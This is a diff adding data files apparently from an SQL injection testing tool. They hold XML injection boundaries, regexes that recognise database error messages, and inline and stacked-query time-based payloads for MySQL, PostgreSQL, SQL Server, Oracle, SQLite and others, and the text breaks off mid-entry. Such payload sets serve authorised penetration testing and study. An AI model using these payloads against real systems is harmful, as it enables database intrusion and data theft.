+        <suffix> AND '[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>3</ptype>
+        <prefix>')</prefix>
+        <suffix> AND ('[RANDSTR]' LIKE '[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>3</ptype>
+        <prefix>'))</prefix>
+        <suffix> AND (('[RANDSTR]' LIKE '[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>3</ptype>
+        <prefix>')))</prefix>
+        <suffix> AND ((('[RANDSTR]' LIKE '[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>3</ptype>
+        <prefix>'</prefix>
+        <suffix> AND '[RANDSTR]' LIKE '[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>")</prefix>
+        <suffix> AND ("[RANDSTR]"="[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>"))</prefix>
+        <suffix> AND (("[RANDSTR]"="[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>")))</prefix>
+        <suffix> AND ((("[RANDSTR]"="[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>"</prefix>
+        <suffix> AND "[RANDSTR]"="[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>5</ptype>
+        <prefix>")</prefix>
+        <suffix> AND ("[RANDSTR]" LIKE "[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>5</ptype>
+        <prefix>"))</prefix>
+        <suffix> AND (("[RANDSTR]" LIKE "[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>5</ptype>
+        <prefix>")))</prefix>
+        <suffix> AND ((("[RANDSTR]" LIKE "[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>5</ptype>
+        <prefix>"</prefix>
+        <suffix> AND "[RANDSTR]" LIKE "[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>1</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix></prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix></prefix>
+        <suffix># [RANDSTR]</suffix>
+    </boundary>
+
+    <!--     e.g. admin' AND [INFERENCE] OR 'foo'='bar' AND password=$password -->
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>'</prefix>
+        <suffix> OR '[RANDSTR1]'='[RANDSTR2]</suffix>
+    </boundary>
+    <!-- End of WHERE/HAVING clause boundaries -->
+
+    <!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>9</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>9</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>9</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)||'</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)||'</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)+'</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)||</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)||</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1</where>
+        <ptype>1</ptype>
+        <prefix>+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)+</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)+</suffix>
+    </boundary>
+    <!-- End of pre-WHERE generic boundaries -->
+
+    <!-- Pre-WHERE derived table boundaries - e.g. "SELECT * FROM (SELECT column FROM table WHERE column LIKE '%$_REQUEST["name"]%') AS t1"-->
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>)) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>1</ptype>
+        <prefix>` WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>1</ptype>
+        <prefix>`) WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+    <!-- End of pre-WHERE derived table boundaries -->
+
+    <!-- Escaped column name (e.g. SELECT `...` FROM table) boundaries -->
+    <boundary>
+        <level>4</level>
+        <clause>8</clause>
+        <where>1</where>
+        <ptype>6</ptype>
+        <prefix>`=`[ORIGINAL]`</prefix>
+        <suffix> AND `[ORIGINAL]`=`[ORIGINAL]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>8</clause>
+        <where>1</where>
+        <ptype>6</ptype>
+        <prefix>"="[ORIGINAL]"</prefix>
+        <suffix> AND "[ORIGINAL]"="[ORIGINAL]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>8</clause>
+        <where>1</where>
+        <ptype>6</ptype>
+        <prefix>]-(SELECT 0 WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)|[[ORIGINAL]</suffix>
+    </boundary>
+    <!-- End of escaped column name boundaries -->
+
+    <!-- AGAINST boolean full-text search boundaries (http://dev.mysql.com/doc/refman/5.5/en/fulltext-boolean.html) -->
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>' IN BOOLEAN MODE)</prefix>
+        <suffix>#</suffix>
+    </boundary>
+    <!-- End of AGAINST boolean full-text search boundaries -->
+</root>
--- a/data/xml/errors.xml
+++ b/data/xml/errors.xml
@@ -0,0 +1,171 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <!-- MySQL -->
+    <dbms value="MySQL">
+        <error regexp="SQL syntax.*?MySQL"/>
+        <error regexp="Warning.*?\Wmysqli?_"/>
+        <error regexp="MySQLSyntaxErrorException"/>
+        <error regexp="valid MySQL result"/>
+        <error regexp="check the manual that corresponds to your (MySQL|MariaDB) server version"/>
+        <error regexp="Unknown column '[^ ]+' in 'field list'"/>
+        <error regexp="MySqlClient\."/>
+        <error regexp="com\.mysql\.jdbc"/>
+        <error regexp="Zend_Db_(Adapter|Statement)_Mysqli_Exception"/>
+        <error regexp="Pdo[./_\\]Mysql"/>
+        <error regexp="MySqlException"/>
+    </dbms>
+
+    <!-- PostgreSQL -->
+    <dbms value="PostgreSQL">
+        <error regexp="PostgreSQL.*?ERROR"/>
+        <error regexp="Warning.*?\Wpg_"/>
+        <error regexp="valid PostgreSQL result"/>
+        <error regexp="Npgsql\."/>
+        <error regexp="PG::SyntaxError:"/>
+        <error regexp="org\.postgresql\.util\.PSQLException"/>
+        <error regexp="ERROR:\s\ssyntax error at or near"/>
+        <error regexp="ERROR: parser: parse error at or near"/>
+        <error regexp="PostgreSQL query failed"/>
+        <error regexp="org\.postgresql\.jdbc"/>
+        <error regexp="Pdo[./_\\]Pgsql"/>
+        <error regexp="PSQLException"/>
+    </dbms>
+
+    <!-- Microsoft SQL Server -->
+    <dbms value="Microsoft SQL Server">
+        <error regexp="Driver.*? SQL[\-\_\ ]*Server"/>
+        <error regexp="OLE DB.*? SQL Server"/>
+        <error regexp="\bSQL Server[^&lt;&quot;]+Driver"/>
+        <error regexp="Warning.*?\W(mssql|sqlsrv)_"/>
+        <error regexp="\bSQL Server[^&lt;&quot;]+[0-9a-fA-F]{8}"/>
+        <error regexp="System\.Data\.SqlClient\.SqlException"/>
+        <error regexp="(?s)Exception.*?\bRoadhouse\.Cms\."/>
+        <error regexp="Microsoft SQL Native Client error '[0-9a-fA-F]{8}"/>
+        <error regexp="\[SQL Server\]"/>
+        <error regexp="ODBC SQL Server Driver"/>
+        <error regexp="ODBC Driver \d+ for SQL Server"/>
+        <error regexp="SQLServer JDBC Driver"/>
+        <error regexp="com\.jnetdirect\.jsql"/>
+        <error regexp="macromedia\.jdbc\.sqlserver"/>
+        <error regexp="Zend_Db_(Adapter|Statement)_Sqlsrv_Exception"/>
+        <error regexp="com\.microsoft\.sqlserver\.jdbc"/>
+        <error regexp="Pdo[./_\\](Mssql|SqlSrv)"/>
+        <error regexp="SQL(Srv|Server)Exception"/>
+    </dbms>
+
+    <!-- Microsoft Access -->
+    <dbms value="Microsoft Access">
+        <error regexp="Microsoft Access (\d+ )?Driver"/>
+        <error regexp="JET Database Engine"/>
+        <error regexp="Access Database Engine"/>
+        <error regexp="ODBC Microsoft Access"/>
+        <error regexp="Syntax error \(missing operator\) in query expression"/>
+    </dbms>
+
+    <!-- Oracle -->
+    <dbms value="Oracle">
+        <error regexp="\bORA-\d{5}"/>
+        <error regexp="Oracle error"/>
+        <error regexp="Oracle.*?Driver"/>
+        <error regexp="Warning.*?\W(oci|ora)_"/>
+        <error regexp="quoted string not properly terminated"/>
+        <error regexp="SQL command not properly ended"/>
+        <error regexp="macromedia\.jdbc\.oracle"/>
+        <error regexp="oracle\.jdbc"/>
+        <error regexp="Zend_Db_(Adapter|Statement)_Oracle_Exception"/>
+        <error regexp="Pdo[./_\\](Oracle|OCI)"/>
+        <error regexp="OracleException"/>
+    </dbms>
+
+    <!-- IBM DB2 -->
+    <dbms value="IBM DB2">
+        <error regexp="CLI Driver.*?DB2"/>
+        <error regexp="DB2 SQL error"/>
+        <error regexp="\bdb2_\w+\("/>
+        <error regexp="SQLSTATE.+SQLCODE"/>
+        <error regexp="com\.ibm\.db2\.jcc"/>
+        <error regexp="Zend_Db_(Adapter|Statement)_Db2_Exception"/>
+        <error regexp="Pdo[./_\\]Ibm"/>
+        <error regexp="DB2Exception"/>
+    </dbms>
+
+    <!-- Informix -->
+    <dbms value="Informix">
+        <error regexp="Warning.*?\Wifx_"/>
+        <error regexp="Exception.*?Informix"/>
+        <error regexp="Informix ODBC Driver"/>
+        <error regexp="ODBC Informix driver"/>
+        <error regexp="com\.informix\.jdbc"/>
+        <error regexp="weblogic\.jdbc\.informix"/>
+        <error regexp="Pdo[./_\\]Informix"/>
+        <error regexp="IfxException"/>
+    </dbms>
+
+    <!-- Interbase/Firebird -->
+    <dbms value="Firebird">
+        <error regexp="Dynamic SQL Error"/>
+        <error regexp="Warning.*?\Wibase_"/>
+        <error regexp="org\.firebirdsql\.jdbc"/>
+        <error regexp="Pdo[./_\\]Firebird"/>
+    </dbms>
+
+    <!-- SQLite -->
+    <dbms value="SQLite">
+        <error regexp="SQLite/JDBCDriver"/>
+        <error regexp="SQLite\.Exception"/>
+        <error regexp="(Microsoft|System)\.Data\.SQLite\.SQLiteException"/>
+        <error regexp="Warning.*?\W(sqlite_|SQLite3::)"/>
+        <error regexp="\[SQLITE_ERROR\]"/>
+        <error regexp="SQLite error \d+:"/>
+        <error regexp="sqlite3.OperationalError:"/>
+        <error regexp="SQLite3::SQLException"/>
+        <error regexp="org\.sqlite\.JDBC"/>
+        <error regexp="Pdo[./_\\]Sqlite"/>
+        <error regexp="SQLiteException"/>
+    </dbms>
+
+    <!-- SAP MaxDB -->
+    <dbms value="SAP MaxDB">
+        <error regexp="SQL error.*?POS([0-9]+)"/>
+        <error regexp="Warning.*?\Wmaxdb_"/>
+        <error regexp="DriverSapDB"/>
+        <error regexp="com\.sap\.dbtech\.jdbc"/>
+    </dbms>
+
+    <!-- Sybase -->
+    <dbms value="Sybase">
+        <error regexp="Warning.*?\Wsybase_"/>
+        <error regexp="Sybase message"/>
+        <error regexp="Sybase.*?Server message"/>
+        <error regexp="SybSQLException"/>
+        <error regexp="Sybase\.Data\.AseClient"/>
+        <error regexp="com\.sybase\.jdbc"/>
+    </dbms>
+
+    <!-- Ingres -->
+    <dbms value="Ingres">
+        <error regexp="Warning.*?\Wingres_"/>
+        <error regexp="Ingres SQLSTATE"/>
+        <error regexp="Ingres\W.*?Driver"/>
+        <error regexp="com\.ingres\.gcf\.jdbc"/>
+    </dbms>
+
+    <!-- Frontbase -->
+    <dbms value="Frontbase">
+        <error regexp="Exception (condition )?\d+\. Transaction rollback"/>
+        <error regexp="com\.frontbase\.jdbc"/>
+    </dbms>
+
+    <!-- HSQLDB -->
+    <dbms value="HSQLDB">
+        <error regexp="Unexpected end of command in statement \["/>
+        <error regexp="Unexpected token.*?in statement \["/>
+        <error regexp="org\.hsqldb\.jdbc"/>
+    </dbms>
+
+    <!-- H2 -->
+    <dbms value="H2">
+        <error regexp="org\.h2\.jdbc"/>
+    </dbms>
+</root>
--- a/data/xml/livetests.xml
+++ b/data/xml/livetests.xml
--- a/data/xml/payloads/boolean_blind.xml
+++ b/data/xml/payloads/boolean_blind.xml
--- a/data/xml/payloads/error_based.xml
+++ b/data/xml/payloads/error_based.xml
--- a/data/xml/payloads/inline_query.xml
+++ b/data/xml/payloads/inline_query.xml
@@ -0,0 +1,125 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <!-- Inline queries tests -->
+    <test>
+        <title>MySQL inline queries</title>
+        <stype>3</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>(SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
+            <payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
+            -->
+            <payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL inline queries</title>
+        <stype>3</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>(SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase inline queries</title>
+        <stype>3</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle inline queries</title>
+        <stype>3</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>(SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL)</vector>
+        <request>
+            <payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]' FROM DUAL)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite inline queries</title>
+        <stype>3</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'</vector>
+        <request>
+            <payload>SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))||'[DELIMITER_STOP]'</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird inline queries</title>
+        <stype>3</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE</vector>
+        <request>
+            <payload>SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+        </details>
+    </test>
+    <!-- End of inline queries tests -->
+</root>
--- a/data/xml/payloads/stacked_queries.xml
+++ b/data/xml/payloads/stacked_queries.xml
@@ -0,0 +1,734 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <!-- Stacked queries tests -->
+    <test>
+        <title>MySQL &gt; 5.0.11 stacked queries (comment)</title>
+        <stype>4</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
+        <request>
+            <payload>;SELECT SLEEP([SLEEPTIME])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt; 5.0.11 stacked queries</title>
+        <stype>4</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
+        <request>
+            <payload>;SELECT SLEEP([SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+     <test>
+        <title>MySQL &gt; 5.0.11 stacked queries (query SLEEP - comment)</title>
+        <stype>4</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt; 5.0.11 stacked queries (query SLEEP)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0.12 stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
+        <request>
+            <payload>;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0.12 stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
+        <request>
+            <payload>;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &gt; 8.1 stacked queries (comment)</title>
+        <stype>4</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;SELECT PG_SLEEP([SLEEPTIME])</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&gt; 8.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &gt; 8.1 stacked queries</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;SELECT PG_SLEEP([SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&gt; 8.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &lt; 8.2 stacked queries (Glibc - comment)</title>
+        <stype>4</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
